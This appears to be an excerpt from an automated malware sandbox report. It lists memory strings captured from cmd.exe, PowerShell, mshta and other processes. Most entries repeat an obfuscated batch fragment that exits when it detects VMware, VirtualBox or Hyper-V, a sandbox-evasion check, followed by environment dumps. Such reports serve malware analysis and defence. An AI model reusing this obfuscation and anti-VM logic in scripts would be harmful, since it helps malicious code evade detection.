"%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit
Source: cmd.exe, 0000000B.00000003.1416696066.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o`
Source: cmd.exe, 0000000B.00000003.1437314516.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O}
Source: cmd.exe, 0000000B.00000003.1426244933.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oXX
Source: cmd.exe, 0000000B.00000003.1423413071.000002C1DCA5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oK
Source: powershell.exe, 00000029.00000002.2241067898.0000016D32AF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OX
Source: powershell.exe, 00000029.00000002.2235182888.0000016D32760000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: doskey.exe, 00000018.00000002.1449210994.0000021E291C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Ou
Source: taskkill.exe, 00000058.00000003.1838496153.000001D1F6759000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbM
Source: cmd.exe, 0000000B.00000003.1423558550.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oZZ
Source: cmd.exe, 0000000B.00000003.1421119512.000002C1DCA59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=o
Source: mshta.exe, 0000001B.00000002.1491137044.000001D062230000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OA
Source: cmd.exe, 0000000B.00000003.1436828284.000002C1DCA5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program 